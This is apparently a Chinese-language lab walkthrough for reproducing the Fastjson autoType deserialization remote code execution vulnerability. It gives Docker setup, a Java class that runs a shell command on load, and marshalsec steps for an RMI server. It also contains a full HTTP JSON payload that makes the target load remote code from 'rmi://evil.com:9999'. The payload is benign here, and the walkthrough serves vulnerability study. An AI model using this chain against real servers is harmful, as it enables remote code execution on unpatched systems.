漏洞描述

fastjson在解析json的过程中，支持使用autoType来实例化某一个具体的类，并调用该类的set/get方法来访问属性。 通过查找代码中相关的方法，即可构造出一些恶意利用链。

参考资料：

• 浅谈Fastjson RCE漏洞的绕过史 - FreeBuf网络安全行业门户
• http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/

漏洞环境及利用

搭建docker环境

环境运行后，访问即可看到JSON格式的输出。http://your-ip:8090

我们向这个地址POST一个JSON对象，即可更新服务端的信息：

curl http://your-ip:8090/ -H "Content-Type: application/json" --data '{"name":"hello", "age":20}'

因为目标环境是Java 8u102，没有的限制，我们可以使用的利用链，借助JNDI注入来执行命令。com.sun.jndi.rmi.object.trustURLCodebasecom.sun.rowset.JdbcRowSetImpl

首先编译并上传命令执行代码

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }

我这里直接用主机编译成字节码文件（最好不要拖，可能因为这个损坏文件不能复现）

将生成的字节码文件拖到虚拟机并在字节码文件处开启http服务

使用Java反序列化利用工具marshalsec辅助开启RMI环境

marshalsec：

git clone https://github.com/mbechler/marshalsec

maven：

 sudo apt-get install maven 

进入目录进行项目编译

mvn clean package -DskipTests

进入target目录，可以看到编译成功

 执行

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://刚class文件的ip或域名/#TouchFile" 9999

向靶场服务器发送Payload，带上RMI的地址：

POST / HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/TouchFile",
        "autoCommit":true
    }
}

 

查看目录，看到文件创建成功